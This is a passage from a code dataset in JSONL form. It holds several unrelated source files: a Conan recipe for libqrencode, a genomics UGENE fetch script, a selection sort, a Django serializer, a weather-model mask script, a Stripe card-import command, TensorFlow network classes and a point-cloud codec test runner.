False\n cmake.definitions[\"WITH_TESTS\"] = False\n cmake.configure(build_folder=self._build_subfolder)\n return cmake\n\n def _patch_sources(self):\n for patch in self.conan_data[\"patches\"][self.version]:\n tools.patch(**patch)\n\n def build(self):\n self._patch_sources()\n cmake = self._configure_cmake()\n cmake.build()\n\n def package(self):\n self.copy(pattern=\"COPYING\", src=self._source_subfolder, dst=\"licenses\")\n cmake = self._configure_cmake()\n cmake.install()\n\n tools.rmdir(os.path.join(self.package_folder, \"lib\", \"pkgconfig\"))\n tools.rmdir(os.path.join(self.package_folder, \"share\"))\n\n def package_info(self):\n lib = \"qrencode\"\n if self.settings.compiler == \"Visual Studio\" and self.settings.build_type == \"Debug\":\n lib += \"d\"\n self.cpp_info.libs = [lib]\n","sub_path":"recipes/libqrencode/all/conanfile.py","file_name":"conanfile.py","file_ext":"py","file_size_in_byte":2325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"109887150","text":"#!/usr/bin/env python3\n\nimport time\nimport argparse\nimport os\nimport re\nimport sys\nfrom Bio import SeqIO\nfrom Bio.Seq import Seq\nfrom Bio.SeqRecord import SeqRecord\nfrom Bio.Alphabet import IUPAC, generic_dna\nfrom Bio.SeqFeature import SeqFeature, FeatureLocation\nimport samtools_lookup\nimport pandas as pd\n\n# VARIABLES\ngenes = \"/home/sfrenk/Documents/Resources/Seq/WS251/genes.gtf\"\ntransposons = \"/home/sfrenk/Documents/Resources/Seq/transposons/ce11_repbase/ce11_transposons.gff3\"\n\n###############################################################################\n\ndef add_feature(input_file, gff_file):\n\n\trecord = SeqIO.read(input_file, \"gb\")\n\trecord.seq.alphabet= generic_dna\n\n\tchrom, start, end = get_coords_from_record(record)\n\n\t# Get features\n\tgff = open(gff_file, \"r\")\n\tfor line in gff:\n\n\t\tfeature_chrom = line.strip().split(\"\\t\")[0]\n\t\tfeature_group = line.strip().split(\"\\t\")[1]\n\t\tfeature_start = int(line.strip().split(\"\\t\")[3])\n\t\tfeature_end = int(line.strip().split(\"\\t\")[4])\n\t\tfeature_strand = line.strip().split(\"\\t\")[6]\n\t\tfeature_name = re.search(\"(name|gene_id)[= ]?([^;]+)\", line.strip().split(\"\\t\")[8]).group(2)\n\n\t\tif feature_chrom == chrom and feature_start < start and feature_end > end:\n\n\t\t\tannot_start = (feature_start-start)\n\t\t\tannot_end = (feature_end-start)\n\n\t\t\tif feature_strand == \"-\":\n\t\t\t\tannot_strand = -1\n\t\t\telse:\n\t\t\t\tannot_strand = 1\n\n\t\t\tfeature = SeqFeature(FeatureLocation(start = (annot_start), end = (annot_end) + 1), type = 'misc_feature', qualifiers = {\"label\" : feature_name, \"ugene_name\" : feature_name, \"ugene_group\" : feature_group}, strand = annot_strand)\n\t\t\trecord.features.append(feature)\n\n\tgff.close()\n\n\treturn(record)\n\ndef get_coords_from_record(record):\n\n\t# Get chromosomal coords of Ugene file from the ID\n\n\tchrom = re.search(\"^([^:]+)\", record.id).group(1)\n\tstart = int(re.search(\":([0-9]+),\", record.id).group(1))\n\tend = int(re.search(\",([0-9]+)$\", record.id).group(1))\n\n\treturn(chrom, start, end)\n\ndef get_features(record, feature = None):\n\n\t# Get coordinates of record\n\tchrom, start, end = get_coords_from_record(record)\n\n\tfeature_files = [genes, transposons]\n\n\tif feature == None:\n\t\tfeature_files.append(feature)\n\n\t\tfeature_regex = re.compile(\"(gene_name |Name=)([^;]*)\")\n\n\t\tfor i in feature_files:\n\t\t\ttable = pd.read_csv(i, sep = \"\\t\", header = None, usecols = [0,3,4,6,8], names = [\"chrom\", \"start\", \"end\", \"strand\", \"feature\"])\n\n\t\t\t# Find features within the specified genomic range\n\t\t\ttable = table.loc[(table.chrom == chrom) & (table.start > start) & (table.end < end),]\n\n\t\t\tfor k, row in table.iterrows():\n\t\t\t\t\n\t\t\t\tname = str(re.search(feature_regex, row.feature).group(2))\n\t\t\t\t\n\t\t\t\tif row.strand == \"-\":\n\t\t\t\t\tstrand = -1\n\t\t\t\telse:\n\t\t\t\t\tstrand = 1\n\n\t\t\t\tfeature = SeqFeature(FeatureLocation(start = (row.start - args.start), end = (row.end - args.start) + 1), type = 'misc_feature', qualifiers = {\"label\" : name, \"ugene_name\" : name}, strand = strand)\n\t\t\t\trecord.features.append(feature)\n\n\treturn(record)\n\n\ndef get_sequence(chrom, start, end, name = None):\n\n\tseq_object = samtools_lookup.get_seq(chrom, start, end).seq\n\n\t# Create a record\n\tcoords = chrom + \":\" + str(start) + \",\" + str(end)\n\trecord = SeqRecord(seq_object,\n\t id = coords,\n\t name = name,\n\t description='Created using ugene_fetch.py')\n\n\treturn(record)\n\n\ndef save_output(record, output_filename):\n\n\toutput_file = open(output_filename, 'w')\n\tSeqIO.write(record, output_file, 'genbank')\n\toutput_file.close()\n\n\ndef main():\n\n\tparser = argparse.ArgumentParser(description = \"Creates Ugene file with sequence and features using coordinates provided\")\n\n\tparser.add_argument(\"-c\", \"--chromosome\")\n\tparser.add_argument(\"-s\", \"--start\", type = int)\n\tparser.add_argument(\"-e\", \"--end\", type = int)\n\tparser.add_argument(\"-n\", \"--name\", help = \"Name of sequence (by default, the name is constructed from the coordinates)\", default = None)\n\tparser.add_argument(\"-d\", \"--directory\", help = \"Output directory (default: current directory)\", default = \".\")\n\tparser.add_argument(\"-f\", \"--feature\", help = \"Optional gff file containing genomic coordinates of extra features\", default = None)\n\tparser.add_argument(\"-a\", \"--add_feature\", help = \"Add features from gff file (using -f/--feature argument) to existing Ugene file\", default = None)\n\n\targs = parser.parse_args()\n\n\tif args.add_feature != None:\n\n\t\tugene_record = add_feature(args.add_feature, args.feature)\n\t\toutput_name = args.add_feature\n\n\telse:\n\n\t\tif args.name == None:\n\t\t\tname = chrom + \"_\" + str(start) + \"_\" + str(end)\n\t\telse:\n\t\t\tname = args.name\n\n\t\tseq = get_sequence(args.chromosome, args.start, args.end, name)\n\t\tugene_record = get_features(seq, args.feature)\n\t\toutput_name = args.directory + \"/\" + name + \".gb\"\n\t\n\tsave_output(ugene_record, output_name)\n\n\nif __name__ == '__main__':\n\n\tmain()\n","sub_path":"ugene_fetch.py","file_name":"ugene_fetch.py","file_ext":"py","file_size_in_byte":4811,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"106928812","text":"def selection_sort(arr):\n\n # For every slot in array\n for fillslot in range(len(arr)-1, 0, -1):\n\n maxpos = 0\n\n # For every set of 0 to fillslot+1\n for location in range(1, fillslot+1):\n\n # Set maximum's location\n if arr[location] > arr[maxpos]:\n maxpos = location\n\n temp = arr[fillslot]\n arr[fillslot] = arr[maxpos]\n arr[maxpos] = temp\n\n\narr = [14, 46, 43, 27, 57, 41, 45, 21, 70]\nselection_sort(arr)\nprint(arr)\n","sub_path":"Search and Sorting/selection_sort.py","file_name":"selection_sort.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"316794807","text":"from rest_framework import serializers\nfrom app.models.Address import Address\nfrom app.models.Email import Email\nfrom app.models.PhoneNumber import PhoneNumber\nfrom app.models.Person import Person\n\n\nclass AddressSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = Address\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass PhoneNumberSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = PhoneNumber\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass EmailSerializer(serializers.ModelSerializer):\n \n class Meta:\n model = Email\n fields = '__all__'\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\nclass PersonSerializer(serializers.ModelSerializer):\n\n addresses = AddressSerializer(many=True)\n phoneNumbers = PhoneNumberSerializer(many=True)\n emails = EmailSerializer(many = True)\n\n class Meta:\n model = Person\n fields = ('id','firstName','lastName','birthday','addresses','phoneNumbers','emails')\n extra_kwargs = {'id': {'read_only': False,'required':False}}\n\n def create(self, validated_data):\n addresses_data = validated_data.pop('addresses')\n phoneNumbers_data = validated_data.pop('phoneNumbers')\n emails_data = validated_data.pop('emails')\n\n newPerson = Person.objects.create(**validated_data)\n \n for address_data in addresses_data:\n Address.objects.create(person = newPerson, **address_data)\n \n for phoneNumber_data in phoneNumbers_data:\n PhoneNumber.objects.create(person = newPerson, **phoneNumber_data)\n \n for email_data in emails_data:\n Email.objects.create(person = newPerson, **email_data)\n \n return newPerson \n\n def update(self,instance,validated_data):\n instance.firstName = validated_data.get('firstName',instance.firstName)\n instance.lastName = validated_data.get('lastName',instance.lastName)\n instance.birthday = validated_data.get('birthday',instance.birthday)\n instance.save()\n\n addresses_data = validated_data.get('addresses')\n phoneNumbers_data = validated_data.get('phoneNumbers')\n emails_data = validated_data.get('emails')\n\n ## DELETING OBJECTS\n emails_db_keys = Email.objects.filter(person_id = instance.id).values_list('id', flat=True) ## EMAILS FROM DATABASE \n emails_keys = list(map(lambda x: x.get('id'), emails_data)) ## EMAILS FROM REQUEST \n\n if emails_keys:\n for key in emails_db_keys:\n if key not in emails_keys:\n Email.objects.filter(id=key).delete()\n else:\n Email.objects.filter(person_id = instance.id).all().delete()\n\n \n phone_db_keys = PhoneNumber.objects.filter(person_id = instance.id).values_list('id',flat = True) ## PHONE NUMBERS FROM DATABASE\n phone_keys = list(map(lambda x: x.get('id'), phoneNumbers_data)) ## PHONE NUMBERS FROM REQUEST\n\n if phone_keys:\n for key in phone_db_keys:\n if key not in phone_keys:\n PhoneNumber.objects.filter(id=key).delete()\n else:\n PhoneNumber.objects.filter(person_id = instance.id).all().delete()\n\n\n address_db_keys = Address.objects.filter(person_id = instance.id).values_list('id',flat = True) ## ADDRESSES FROM DATABASE\n address_keys = list(map(lambda x: x.get('id'), addresses_data)) ## ADDRESSES FROM REQUEST\n\n if address_keys:\n for key in address_db_keys:\n if key not in address_keys:\n Address.objects.filter(id=key).delete()\n else:\n Address.objects.filter(person_id = instance.id).all().delete()\n\n\n\n ## UPDATING OBJECTS \n if addresses_data:\n for address in addresses_data:\n address_id = address.get('id',None) \n if address_id: ## MODIFY ADDRESS IF IT EXISTS\n addressItem = Address.objects.get(id=address_id, person = instance)\n addressItem.street = address.get('street', addressItem.street)\n addressItem.postalCode = address.get('postalCode',addressItem.postalCode)\n addressItem.city = address.get('city',addressItem.city)\n addressItem.state = address.get('state',addressItem.state)\n addressItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE \n Address.objects.create(person_id = instance.id, **address)\n \n if phoneNumbers_data:\n for phoneNumber in phoneNumbers_data:\n phoneNumber_id = phoneNumber.get('id',None)\n if phoneNumber_id: ## MODIFY PHONE NUMBER IF IT EXISTS\n phoneNumberItem = PhoneNumber.objects.get(id=phoneNumber_id, person_id = instance)\n phoneNumberItem.number = phoneNumber.get('number', phoneNumberItem.number)\n phoneNumberItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE\n PhoneNumber.objects.create(person_id = instance.id, **phoneNumber)\n \n if emails_data:\n for email in emails_data:\n email_id = email.get('id',None)\n if email_id: ## MODIFY ADDRESS IF IT EXISTS\n emailItem = Email.objects.get(id=email_id, person = instance)\n emailItem.description = email.get('description', emailItem.description)\n emailItem.save()\n else: ## IF ADDRESS DOES NOT EXIST SO CREATE NEW ONE\n Email.objects.create(person_id = instance.id, **email) \n\n\n return instance\n\n\n ","sub_path":"app/serializers/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":5919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"228729443","text":"\"\"\"\n Use the RAP model to provide a mask for use in clutter suppression by\n the NEXRAD compositer\n\"\"\"\nfrom __future__ import print_function\nimport os\nimport sys\nimport datetime\nimport warnings\n\nimport numpy as np\nimport pytz\nfrom osgeo import gdal, gdalconst\nfrom scipy import interpolate\nimport pygrib\n\n# n0r_ructemps.py:55: RuntimeWarning: invalid value encountered in less\n# ifreezing = np.where( T < 279.0, 1., 0.)\nwarnings.simplefilter(\"ignore\", RuntimeWarning)\n\n\ndef run(utc):\n \"\"\"Run for a valid timestamp\"\"\"\n grbs = None\n # Search for valid file\n for fhour in range(10):\n ts = utc - datetime.timedelta(hours=fhour)\n fstr = \"%03i\" % (fhour,)\n fn = ts.strftime(\n \"/mesonet/ARCHIVE/data/%Y/%m/%d/model/rap/\"\n \"%H/rap.t%Hz.awp130f\" + fstr + \".grib2\"\n )\n # print fn\n if not os.path.isfile(fn):\n continue\n try:\n grib = pygrib.open(fn)\n grbs = grib.select(name=\"2 metre temperature\")\n except Exception as _exp:\n continue\n if grbs is not None:\n break\n if grbs is None:\n print(\"n0r_ructemps major failure! No data found for %s\" % (utc,))\n return\n tmpk_2m = grbs[0].values\n lat, lon = grbs[0].latlons()\n\n x = np.arange(-126.0, -66.0, 0.01)\n y = np.arange(24.0, 50.0, 0.01)\n xx, yy = np.meshgrid(x, y)\n\n T = interpolate.griddata(\n (lon.ravel(), lat.ravel()), tmpk_2m.ravel(), (xx, yy), method=\"cubic\"\n )\n T = np.flipud(T)\n\n \"\"\"\n import matplotlib.pyplot as plt\n plt.subplot(111)\n im = plt.imshow(T, extent=(0,1,1,0))\n plt.colorbar(im)\n plt.savefig('test.png')\n \"\"\"\n\n # Anything less than 6 C we will not consider for masking\n ifreezing = np.where(T < 279.0, 1.0, 0.0)\n\n n0rct = gdal.ColorTable()\n n0rct.SetColorEntry(0, (0, 0, 0))\n n0rct.SetColorEntry(1, (255, 0, 0))\n\n out_driver = gdal.GetDriverByName(\"GTiff\")\n outfn = \"data/ifreeze-%s.tif\" % (utc.strftime(\"%Y%m%d%H\"),)\n outdataset = out_driver.Create(outfn, 6000, 2600, 1, gdalconst.GDT_Byte)\n # Set output color table to match input\n outdataset.GetRasterBand(1).SetRasterColorTable(n0rct)\n outdataset.GetRasterBand(1).WriteArray(ifreezing)\n\n\ndef main(argv):\n \"\"\"Go Main Go\"\"\"\n # Script runs at :58 after and we generate a file valid for the next hour\n utc = datetime.datetime.utcnow()\n utc = utc + datetime.timedelta(hours=1)\n utc = utc.replace(tzinfo=pytz.utc)\n if len(argv) == 5:\n utc = utc.replace(\n year=int(argv[1]), month=int(argv[2]), day=int(argv[3]), hour=int(argv[4])\n )\n run(utc)\n\n\nif __name__ == \"__main__\":\n main(sys.argv)\n","sub_path":"n0r_ructemps.py","file_name":"n0r_ructemps.py","file_ext":"py","file_size_in_byte":2693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"69668120","text":"from django.core.management.base import BaseCommand\n\nfrom hosting.models import UserCardDetail\nfrom membership.models import CustomUser\nfrom utils.stripe_utils import StripeUtils\n\n\nclass Command(BaseCommand):\n help = '''Imports the usercard details of all customers. Created just for\n multiple card support.'''\n\n def handle(self, *args, **options):\n try:\n stripe_utils = StripeUtils()\n for user in CustomUser.objects.all():\n if hasattr(user, 'stripecustomer'):\n if user.stripecustomer:\n card_details_resp = stripe_utils.get_card_details(\n user.stripecustomer.stripe_id\n )\n card_details = card_details_resp['response_object']\n if card_details:\n ucd = UserCardDetail.get_or_create_user_card_detail(\n stripe_customer=user.stripecustomer,\n card_details=card_details\n )\n UserCardDetail.save_default_card_local(\n user.stripecustomer.stripe_id,\n ucd.card_id\n )\n print(\"Saved user card details for {}\".format(\n user.email\n ))\n else:\n print(\" --- Could not get card details for \"\n \"{}\".format(user.email))\n print(\" --- Error: {}\".format(\n card_details_resp['error']\n ))\n else:\n print(\" === {} does not have a StripeCustomer object\".format(\n user.email\n ))\n except Exception as e:\n print(\" *** Error occurred. Details {}\".format(str(e)))\n","sub_path":"hosting/management/commands/import_usercarddetails.py","file_name":"import_usercarddetails.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"443589975","text":"#!/usr/bin/env python\n# encoding: utf-8\n'''\n@author: songyunlong\n@license: (C) Copyright 2018-2021, Node Supply Chain Manager Corporation Limited.\n@contact: 1243049371@qq.com\n@software:PyCharm\n@file: AllNet\n@time: 2019/2/2 23:08\n@desc:\n'''\nimport tensorflow as tf\nimport numpy as np\n\nclass NeuralNetwork:\n\n @staticmethod\n def flat(tensor):\n '''\n 将高维张量维度降至二维\n :param tensor: type= Variable, 待处理张量\n :return: 维度坍塌后的低维张量\n '''\n # 张量维度\n dimension = tensor.get_shape().as_list() # type= list\n all_dim = np.multiply.reduce(np.array(dimension))\n return tf.reshape(tensor, shape=(all_dim,)) # type= Variable\n\n def __init__(self, x):\n '''\n 神经网络构造函数\n :param x: 单一数据特征\n '''\n self.x = x\n\nclass FNN(NeuralNetwork):\n\n @staticmethod\n def fc_layer(para, w, b, keep_prob):\n '''\n :param para: shape= (1, den)单层输入\n :param w: shape= (den, den_w), 参数矩阵\n :param b: shape= (den_w, )偏置矩阵\n 单层全连接层,加入dropout和relu操作\n :return: op, 单层节点\n '''\n h = tf.matmul(para, w) + b\n h = tf.nn.dropout(h, keep_prob)\n h = tf.nn.relu(h)\n return h\n\n def __init__(self, x, w):\n '''\n 全连接网络构造函数\n :param x: Tensor, 单一数据特征\n :param w: types = ((W, bia),..., ), W, b为参数矩阵和偏置矩阵\n '''\n super(FNN, self).__init__(x)\n self.__w = w\n\n def fc_concat(self, keep_prob):\n '''\n 构建全连接网络部分组合\n :return: op, 全连接网络部分输出节点\n '''\n initial = 1\n fc_ops = None\n for parameters in self.__w:\n w, b = parameters\n if initial:\n fc_ops = FNN.fc_layer(para= self.x, w= w, b= b, keep_prob= keep_prob)\n initial = 0\n else:\n fc_ops = FNN.fc_layer(para= fc_ops, w= w, b= b, keep_prob= keep_prob)\n\n return fc_ops\n\n\nclass CNN(NeuralNetwork):\n\n @staticmethod\n def reshape(f_vector, new_shape):\n '''\n 对输入Tensor类型张量进行维度变换\n :param f_vector: type= Tensor, 待处理特征向量\n :param new_shape: iterable, 变换后维度\n :return: 处理后的特征向量\n '''\n return tf.reshape(f_vector, new_shape)\n\n def __init__(self, x, w_conv, stride_conv, stride_pool):\n '''\n 卷积神经网络构造函数\n :param x: Tensor, 单一数据特征\n :param w_conv: tf.Variable, 单个卷积核(4维)\n :param stride_conv: 卷积核移动步伐\n :param stride_pool: 池化核移动步伐\n '''\n super(CNN, self).__init__(x)\n self.__w_conv = w_conv\n self.__stride_conv = stride_conv\n self.__stride_pool = stride_pool\n\n def convolution(self, input='x'):\n '''\n 单层卷积操作\n :param input: setdefult:x, 输入待进行卷积操作节点\n :return: ops, 单层卷积操作后节点\n '''\n input = input if input != 'x' else self.x\n return tf.nn.conv2d(input= input, filter= self.__w_conv, strides= [1, self.__stride_conv, self.__stride_conv, 1], padding= 'SAME')\n\n def pooling(self, pool_fun, input):\n '''\n 单层池化操作\n :param input: 输入节点\n :param pool_fun: 池化函数\n :return: 单层池化操作后节点\n '''\n return pool_fun(value= input, ksize= [1, self.__stride_pool, self.__stride_pool, 1],\n strides= [1, self.__stride_pool, self.__stride_pool, 1], padding= 'SAME')\n\n def batch_normoalization(self, input, is_training, moving_decay= 0.9, eps= 1e-5):\n '''\n 批处理层操作\n :param input: Tensor/Variable, 输入张量\n :param is_training: type= tf.placeholder, (True/False)指示当前模型是处在训练还是测试时段\n :param moving_decay: 滑动平均所需的衰减率\n :param eps: 防止bn操作时出现分母病态条件\n :return: BN层输出节点\n '''\n #获取张量维度元组\n input_shape = input.get_shape().as_list()\n #BN公式中的期望和方差学习参数\n beta = tf.Variable(tf.zeros(shape= ([input_shape[-1]])), dtype= tf.float32)\n gamma = tf.Variable(tf.ones(shape= ([input_shape[-1]])), dtype= tf.float32)\n axes = list(range(len(input_shape) - 1))\n #计算各个批次的均值和方差节点\n batch_mean, batch_var = tf.nn.moments(x= input, axes= axes)\n #滑动平均处理各个批次的均值和方差\n ema = tf.train.ExponentialMovingAverage(moving_decay)\n\n def mean_var_with_update():\n #设置应用滑动平均的张量节点\n ema_apply_op = ema.apply([batch_mean, batch_var])\n #明确控制依赖\n with tf.control_dependencies([ema_apply_op]):\n return tf.identity(batch_mean), tf.identity(batch_var)\n\n #训练时,更新均值与方差,测试时使用之前最后一次保存的均值与方差\n mean, var = tf.cond(tf.equal(is_training, True), mean_var_with_update,\n lambda: (ema.average(batch_mean), ema.average(batch_var)))\n # 最后执行batch normalization\n return tf.nn.batch_normalization(input, mean, var, beta, gamma, eps)\n\n\nclass RNN(NeuralNetwork):\n\n @staticmethod\n def get_a_cell(num_units, style):\n '''\n 制作一个LSTM/GRU节点\n :param num_units: 隐藏层向量维度\n :param style: 网络名称\n :return: ops, 循环网络节点\n '''\n\n return tf.nn.rnn_cell.LSTMCell(num_units= num_units) if style == 'LSTM' else tf.nn.rnn_cell.GRUCell(num_units= num_units)\n\n @staticmethod\n def reshape(x, max_time):\n '''\n 对输入Tensor特征进行维度转换\n :param x: type: Tensor, 单一特征数据\n :param max_time: 最大循环次数\n :return: 维度转换后的特征\n '''\n den_3 = x.get_shape().as_list()[-1] // max_time\n para_shape = (-1, max_time, den_3)\n return tf.reshape(x, para_shape)\n\n def __init__(self, x, max_time, num_units):\n '''\n 循环网络构造函数\n :param x: Tensor, 单一特征数据\n :param max_time: 最大循环次数\n :param num_units: 隐藏层向量维度\n '''\n super(RNN, self).__init__(x)\n self.__max_time = max_time\n self.__num_units = num_units\n\n def dynamic_rnn(self, style, output_keep_prob):\n '''\n 按时间步展开计算循环网络\n :param style: LSTM/GRU\n :param output_keep_prob: rnn节点中dropout概率\n :return: 各个时间步输出值和最终时间点输出值\n '''\n cell = RNN.get_a_cell(num_units= self.__num_units, style= style)\n #添加在循环网络中加入dropout操作\n cell = tf.nn.rnn_cell.DropoutWrapper(cell= cell, input_keep_prob= 1.0, output_keep_prob= output_keep_prob)\n #将原始输入数据变换维度\n x_in = RNN.reshape(x= self.x, max_time= self.__max_time)\n outputs, fin_state = tf.nn.dynamic_rnn(cell, x_in, dtype= tf.float32)\n return outputs, fin_state\n\n def dynamic_multirnn(self, style, layers_num, output_keep_prob, is_reshape='no'):\n '''\n 按时间步展开计算多层循环网络\n :param style: LSTM/GRU\n :param layers_num: RNN层数\n :param output_keep_prob: rnn节点中dropout概率\n :param is_reshape: 默认为'no', 指示是否需要转换输入张量维度, 若需要可写'yes'\n :return: 各个时间步输出值和最终时间点输出值\n '''\n # 建立多层rnn节点对象\n cells = tf.nn.rnn_cell.MultiRNNCell([tf.nn.rnn_cell.DropoutWrapper(\n cell=RNN.get_a_cell(num_units=self.__num_units, style=style), input_keep_prob=1.0,\n output_keep_prob=output_keep_prob) for _ in range(layers_num)])\n if is_reshape == 'yes':\n x_in = RNN.reshape(x=self.x, max_time=self.__max_time)\n else:\n x_in = self.x\n outputs, fin_state = tf.nn.dynamic_rnn(cells, x_in, dtype=tf.float32)\n return outputs, fin_state\n\nif __name__ == '__main__':\n rnn = RNN(1, 2, 3)\n\n\n\n\n\n\n","sub_path":"Stacking/AllNet.py","file_name":"AllNet.py","file_ext":"py","file_size_in_byte":8485,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"547195316","text":"import os\r\n\r\n\r\n#需要修改的参数\r\nhomedir = os.getcwd()\r\ndirpath = homedir + '\\\\'\r\ncfgpath = dirpath + 'cfg\\\\octree-predlift\\\\'\r\ndatasetpath = 'E:\\\\mpeg-pcc-tmc13-master\\\\dataset\\\\'\r\n\r\n\r\ntmc3 = 'tmc3_2.exe'\r\npce = 'pc_error_2.exe'\r\n#os.mkdir('log')\r\nlogpath = 'log\\\\'\r\n\r\ncatA_lst = list([\t\t\t\t\r\n\t\t\t\t'basketball_player_vox11_00000200',\r\n\t\t\t\t'boxer_viewdep_vox12',\r\n\t\t\t\t'dancer_vox11_00000001',\r\n\t\t\t\t'egyptian_mask_vox12',\r\n\t\t\t\t'facade_00009_vox12',\r\n\t\t\t\t'facade_00015_vox14',\r\n\t\t\t\t'facade_00064_vox11',\r\n\t\t\t\t'frog_00067_vox12',\r\n\t\t\t\t'head_00039_vox12',\r\n\t\t\t\t'house_without_roof_00057_vox12',\r\n\t\t\t\t'longdress_viewdep_vox12',\r\n\t\t\t\t'longdress_vox10_1300',\r\n\t\t\t\t'loot_viewdep_vox12',\r\n\t\t\t\t'loot_vox10_1200',\r\n\t\t\t\t'queen_0200',\r\n\t\t\t\t'redandblack_viewdep_vox12',\r\n\t\t\t\t'redandblack_vox10_1550',\r\n\t\t\t\t'shiva_00035_vox12',\r\n\t\t\t\t'soldier_viewdep_vox12',\r\n\t\t\t\t'soldier_vox10_0690',\r\n\t\t\t\t'thaidancer_viewdep_vox12',\r\n\t\t\t\t'ulb_unicorn_vox13',\r\n\t\t\t\t'citytunnel_q1mm',\r\n\t\t\t\t'overpass_q1mm',\r\n\t\t\t\t'tollbooth_q1mm',\r\n])\r\n\r\ncatB_lst = list([\t\t\t\t\r\n\t\t\t\t'arco_valentino_dense_vox12',\r\n\t\t\t\t'arco_valentino_dense_vox20',\r\n\t\t\t\t'egyptian_mask_vox20',\r\n\t\t\t\t'facade_00009_vox20',\r\n\t\t\t\t'facade_00015_vox20',\r\n\t\t\t\t'facade_00064_vox14',\r\n\t\t\t\t'facade_00064_vox20',\r\n\t\t\t\t'frog_00067_vox20',\r\n\t\t\t\t'head_00039_vox20',\r\n\t\t\t\t'house_without_roof_00057_vox20',\r\n\t\t\t\t'landscape_00014_vox14',\r\n\t\t\t\t'landscape_00014_vox20',\r\n\t\t\t\t'palazzo_carignano_dense_vox14',\r\n\t\t\t\t'palazzo_carignano_dense_vox20',\r\n\t\t\t\t'shiva_00035_vox20',\r\n\t\t\t\t'stanford_area_2_vox16',\r\n\t\t\t\t'stanford_area_2_vox20',\r\n\t\t\t\t'stanford_area_4_vox16',\r\n\t\t\t\t'stanford_area_4_vox20',\r\n\t\t\t\t'staue_klimt_vox12',\r\n\t\t\t\t'staue_klimt_vox20',\r\n\t\t\t\t'ulb_unicorn_hires_vox15',\r\n\t\t\t\t'ulb_unicorn_hires_vox20',\r\n\t\t\t\t'ulb_unicorn_vox20',\r\n])\t\r\n\r\nford_01_file_lst = list()\r\nford_02_file_lst = list()\r\nford_03_file_lst = list()\r\n\r\nnum_lst1 = range(100,1000,1)\r\nnum_lst2 = range(1000,1600,1)\r\nnum_lst3 = range(200,1000,1)\r\nnum_lst4 = range(1000,1700,1)\r\nnum_lst5 = range(1,7,1)\r\n\r\nfor name4 in num_lst1:\r\n\t\tford_01_file_lst.append( 'Ford_01_vox1mm-0' + str(name4))\r\nfor name5 in num_lst2:\r\n\t\tford_01_file_lst.append( 'Ford_01_vox1mm-' + str(name5))\r\n\t\t\r\nfor name4 in num_lst1:\r\n\t\tford_02_file_lst.append( 'Ford_02_vox1mm-0' + str(name4))\r\nfor name5 in num_lst2:\r\n\t\tford_02_file_lst.append( 'Ford_02_vox1mm-' + str(name5))\t\r\n\t\t\r\nfor name4 in num_lst3:\r\n\t\tford_03_file_lst.append( 'Ford_03_vox1mm-0' + str(name4))\r\nfor name5 in num_lst4:\r\n\t\tford_03_file_lst.append( 'Ford_03_vox1mm-' + str(name5))\t\r\n\t\t\t\r\nC1_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n\t\t\t\t'r06',\r\n ])\r\n\t\t\r\nC2_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n\t\t\t\t'r06',\r\n ])\r\n\t\t\r\nCW_num_lst = list([\r\n\t\t\t\t'r01',\r\n ])\r\n\t\t\r\nCY_num_lst = list([\r\n\t\t\t\t'r01',\r\n\t\t\t\t'r02',\r\n\t\t\t\t'r03',\r\n\t\t\t\t'r04',\r\n\t\t\t\t'r05',\r\n ])\r\n\t\t\r\noutput = open('runLog_2.txt', 'w')\r\noutputError = open('runDismatch_2.txt', 'w')\r\n\r\ndef getResolution(name2,num):\r\n\tpcerrorcfg = (cfgpath + cond + '\\\\' + name2 + '\\\\' + num + '\\\\pcerror.cfg')\r\n\treader = open( pcerrorcfg, 'r')\r\n\tResolution = 0\r\n\tfor line in reader:\r\n\t\twords = line.split()\r\n\t\tif ('resolution:' == words[0]):\r\n\t\t\tResolution = int(words[1])\r\n\t\t\tbreak\r\n\treturn str(Resolution)\r\n\r\ndef getPointCount(dec,declog,enclog):\r\n\tdecfile = open(dec,'r')\r\n\tvoxelnum = 0\r\n\tfor line in decfile:\r\n\t\twords = line.split()\r\n\t\tif words[0]=='element' and words[1]=='vertex':\r\n\t\t\tvoxelnum = words[2]\r\n\t\t\tbreak\r\n\tchangedeclog = open(enclog,'a')\r\n\tchangedeclog.write('\\nTotal point count: ' + voxelnum)\r\n\tchangedeclog = open(declog,'a')\r\n\tchangedeclog.write('\\nTotal point count: ' + voxelnum)\r\n\r\n#运行start\r\n\r\n#C1\r\ncond = 'lossless-geom-lossy-attrs'\r\nname1 = cond + '_'\r\nC1_lst = ford_01_file_lst + ford_02_file_lst + ford_03_file_lst\r\nfor name2 in C1_lst:\r\n\tfor num in C1_num_lst:\r\n\t\tname3 = ('_' + num)\r\n\t\tcodname = (name1 + name2 + name3)\r\n\t\tcfgname2 = ('f' + name2[1:8] + 'q1mm')\r\n\t\tencconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + '\\\\encoder.cfg')\r\n\t\tdecconfig =(cfgpath + cond + '\\\\' + cfgname2 + '\\\\' + num + 